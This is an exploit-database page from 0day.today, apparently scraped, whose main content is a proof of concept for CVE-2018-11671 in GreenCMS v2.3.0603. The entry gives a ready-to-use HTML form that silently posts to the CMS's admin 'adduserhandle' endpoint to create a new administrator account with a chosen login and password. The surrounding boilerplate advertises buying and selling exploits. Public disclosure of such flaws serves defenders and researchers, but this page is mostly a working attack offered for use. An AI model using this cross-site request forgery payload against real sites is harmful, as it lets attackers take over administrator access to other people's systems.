0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin) Vulnerability
Author
Risk
[
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin # Exploit Author: xichao # Vendor Homepage: https://github.com/GreenCMS/GreenCMS # Software Link: https://github.com/GreenCMS/GreenCMS # Version: v2.3.0603 # CVE : CVE-2018-11671 An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle. poc: <span style="font-size:18px;"><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>csrftest</title> </head> <body> <form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer"> <input type="hidden" name="user_id0" value="1"> <input type="hidden" name="user_login" value="test1"> <input type="hidden" name="password" value="test1"> <input type="hidden" name="rpassword" value="test1"> <input type="hidden" name="user_nicename" value="123"> <input type="hidden" name="user_email" value="123%40Qq.com"> <input type="hidden" name="user_url" value="www.baidu.com"> <input type="hidden" name="user_intro" value="test"> <input type="hidden" name="user_status" value="1"> <input type="hidden" name="role_id" value="1"> <button type="submit" value="Submit">add admin</button> </form> </body> </html></span> References: http://www.iwantacve.cn/index.php/archives/39/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671 https://github.com/GreenCMS/GreenCMS/issues/109 # 0day.today [2024-11-16] #